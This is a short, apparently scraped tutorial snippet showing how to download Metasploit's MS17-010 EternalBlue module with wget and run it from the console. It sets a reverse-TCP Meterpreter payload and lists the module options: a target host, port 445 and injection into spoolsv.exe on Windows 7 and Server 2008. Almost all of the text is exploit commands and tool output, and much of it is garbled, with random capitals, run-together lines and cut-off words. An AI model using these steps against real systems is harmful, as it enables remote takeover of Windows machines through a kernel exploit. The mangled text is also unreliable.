Wget "https://raw.githubusercontent.com/rapid7/metasploit-framework/6d81ca42087efd6548bfcf924172376d5234a25a/ Modules/exploits/windows/smb/ms17_010_eternalblue.rb "-o/usr/share/metasploit-framework/modules/exploits/ Windows/smb/ms17_010_eternalblue.rb
Reference:
Https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue
MSF exploit (handler) > Set payload windows/x64/meterpreter/reverse_tcppayload = windows/x64/meterpreter/ REVERSE_TCPMSF exploit (handler) > Use EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUEMSF exploit (ms17_010_eternalblue) > Show Optionsmodule Options (exploit/windows/smb/ms17_010_eternalblue): Name current Setting Require D Description--------------------------------------groomallocations Yes Initial number of times to groom the kernel pool. Groomdelta 5 Yes the amount to increase the groom count by per try. Maxexploitattempts 3 Yes the number of times to retry the exploit. ProcessName Spoolsv.exe Yes Process to inject payload into. RHOST Yes the target address Rport 445 yes the tar Get Port (TCP) Exploit target:id Name------0 Windows 7 and Server 20(x64) All Service Packs
ms17-010 eternalblue SMB Remote Windows Kernel Pool corruption 2017-05-18 16:45